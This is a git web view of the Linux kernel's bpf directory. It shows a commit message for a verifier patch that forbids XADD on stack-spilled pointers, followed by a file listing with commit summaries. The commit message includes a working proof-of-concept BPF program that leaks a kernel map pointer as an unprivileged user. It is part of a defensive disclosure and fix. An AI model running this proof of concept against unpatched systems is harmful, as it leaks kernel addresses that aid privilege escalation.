linux_dsm_epyc7002/kernel/bpf
Jann Horn 6e7e63cbb0 bpf: Forbid XADD on spilled pointers for unprivileged users
When check_xadd() verifies an XADD operation on a pointer to a stack slot
containing a spilled pointer, check_stack_read() verifies that the read,
which is part of XADD, is valid. However, since the placeholder value -1 is
passed as `value_regno`, check_stack_read() can only return a binary
decision and can't return the type of the value that was read. The intent
here is to verify whether the value read from the stack slot may be used as
a SCALAR_VALUE; but since check_stack_read() doesn't check the type, and
the type information is lost when check_stack_read() returns, this is not
enforced, and a malicious user can abuse XADD to leak spilled kernel
pointers.

Fix it by letting check_stack_read() verify that the value is usable as a
SCALAR_VALUE if no type information is passed to the caller.

To be able to use __is_pointer_value() in check_stack_read(), move it up.

Fix up the expected unprivileged error message for a BPF selftest that,
until now, assumed that unprivileged users can use XADD on stack-spilled
pointers. This also gives us a test for the behavior introduced in this
patch for free.

In theory, this could also be fixed by forbidding XADD on stack spills
entirely, since XADD is a locked operation (for operations on memory with
concurrency) and there can't be any concurrency on the BPF stack; but
Alexei has said that he wants to keep XADD on stack slots working to avoid
changes to the test suite [1].

The following BPF program demonstrates how to leak a BPF map pointer as an
unprivileged user using this bug:

    // r7 = map_pointer
    BPF_LD_MAP_FD(BPF_REG_7, small_map),
    // r8 = launder(map_pointer)
    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_7, -8),
    BPF_MOV64_IMM(BPF_REG_1, 0),
    ((struct bpf_insn) {
      .code  = BPF_STX | BPF_DW | BPF_XADD,
      .dst_reg = BPF_REG_FP,
      .src_reg = BPF_REG_1,
      .off = -8
    }),
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_FP, -8),

    // store r8 into map
    BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_7),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()

[1] https://lore.kernel.org/bpf/20200416211116.qxqcza5vo2ddnkdq@ast-mbp.dhcp.thefacebook.com/

Fixes: 17a5267067 ("bpf: verifier (add verifier core)")
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Alexei Starovoitov <ast@kernel.org>
Link: https://lore.kernel.org/bpf/20200417000007.10734-1-jannh@google.com
2020-04-20 18:41:34 -07:00
..
arraymap.c bpf: Add lookup and update batch ops to arraymap 2020-01-15 14:00:35 -08:00
bpf_lru_list.c treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 206 2019-05-30 11:29:53 -07:00
bpf_lru_list.h bpf: Fix a typo "inacitve" -> "inactive" 2020-04-06 21:54:10 +02:00
bpf_lsm.c bpf: lsm: Implement attach, detach and execution 2020-03-30 01:34:00 +02:00
bpf_struct_ops_types.h bpf: tcp: Support tcp_congestion_ops in bpf 2020-01-09 08:46:18 -08:00
bpf_struct_ops.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net 2020-03-25 18:58:11 -07:00
btf.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next 2020-03-30 19:52:37 -07:00
cgroup.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next 2020-03-30 19:52:37 -07:00
core.c bpf: Enable bpf cgroup hooks to retrieve cgroup v2 and ancestor id 2020-03-27 19:40:39 -07:00
cpumap.c cpumap: Avoid warning when CONFIG_DEBUG_PER_CPU_MAPS is enabled 2020-04-20 18:38:04 -07:00
devmap.c bpf, xdp: Remove no longer required rcu_read_{un}lock() 2020-01-27 11:16:25 +01:00
disasm.c treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 295 2019-06-05 17:36:38 +02:00
disasm.h treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 295 2019-06-05 17:36:38 +02:00
dispatcher.c bpf: Remove bpf_image tree 2020-03-13 12:49:52 -07:00
hashtab.c bpf: Replace zero-length array with flexible-array member 2020-02-28 01:21:02 +01:00
helpers.c bpf: Enable bpf cgroup hooks to retrieve cgroup v2 and ancestor id 2020-03-27 19:40:39 -07:00
inode.c bpf: Introduce pinnable bpf_link abstraction 2020-03-02 22:06:27 -08:00
local_storage.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net 2019-12-22 09:54:33 -08:00
lpm_trie.c bpf: Replace zero-length array with flexible-array member 2020-02-28 01:21:02 +01:00
Makefile bpf: Introduce BPF_PROG_TYPE_LSM 2020-03-30 01:34:00 +02:00
map_in_map.c bpf: Introduce BPF_MAP_TYPE_STRUCT_OPS 2020-01-09 08:46:18 -08:00
map_in_map.h treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 206 2019-05-30 11:29:53 -07:00
offload.c bpf, offload: Replace bitwise AND by logical AND in bpf_prog_offload_info_fill 2020-02-17 16:53:49 +01:00
percpu_freelist.c bpf: Dont iterate over possible CPUs with interrupts disabled 2020-02-24 16:18:20 -08:00
percpu_freelist.h treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 206 2019-05-30 11:29:53 -07:00
queue_stack_maps.c bpf: move memory size checks to bpf_map_charge_init() 2019-05-31 16:52:56 -07:00
reuseport_array.c net: Generate reuseport group ID on group creation 2020-02-21 22:29:45 +01:00
stackmap.c bpf/stackmap: Dont trylock mmap_sem with PREEMPT_RT and interrupts disabled 2020-02-24 16:20:10 -08:00
syscall.c bpf: Prevent re-mmap()'ing BPF map as writable for initially r/o mapping 2020-04-14 21:28:57 +02:00
sysfs_btf.c bpf: Support llvm-objcopy for vmlinux BTF 2020-03-19 12:32:38 +01:00
tnum.c bpf: Verifier, do explicit ALU32 bounds tracking 2020-03-30 14:59:53 -07:00
trampoline.c bpf: lsm: Implement attach, detach and execution 2020-03-30 01:34:00 +02:00
verifier.c bpf: Forbid XADD on spilled pointers for unprivileged users 2020-04-20 18:41:34 -07:00
xskmap.c xsk: Make xskmap flush_list common for all map instances 2019-12-19 21:09:43 -08:00